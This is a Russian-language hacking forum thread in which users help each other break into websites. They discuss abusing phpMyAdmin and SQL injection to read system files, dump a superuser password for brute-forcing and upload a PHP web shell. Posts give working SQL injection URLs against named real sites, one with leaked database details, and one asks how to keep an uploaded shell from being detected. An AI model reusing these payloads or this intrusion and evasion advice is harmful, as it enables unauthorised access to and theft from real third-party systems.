в phpmyadmin если есть доступк обычного юзера, можно как-то смотреть phpinfo или что-то подобное? phpmyadmin 3.3.2deb1
(( белая страница. неважно. нашел уже путь. а теперь проблема. у директрорий стойт 777 права но мускл юзер не может писать/читсть (((( почему? ведь /etc/passwd читает
"chmod 1777" тебе спасет, но кажется у тебя нет прав на выполнение каманд в обалочке. попробуй в другие папки...
с чего ты взял что там чмод 777 ? 13 ошибка выдает именно то что неты прав на ззапись в данную папку, файл_прив проверял у юзверя? ди унде ешть уэй ?
я имел ввиду папки, которые видны из веб спроведливый вопрос. rootmd это когда phpmyadmin стал показывать chmod?
Народ, чем брутить SQl inj вида 1'+and+'1'='1 Вроде есть тулзы для брута через substring()? кинте в лс плиз
не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать? имеется 1. sql injection, под суперюзером 2. phpmyadmin, нормальный юзер
1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху.. 2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
eclipse http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+ версия как бы намекае
http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4-- Version 4.1.22-Max Uzver [email protected] DB db1081176_stiga_table_tennis так что брути таблы... upd ~d0s~ опередил )
Что за скрипт умет находить шеллы? И что можно сделать что бы не детектил.. Заливаю на сайт шелл , на следующий день его нет. В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
очень часто поподаются бд из которых выводится только CHARACTER_SETS как быть в таком случае? http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--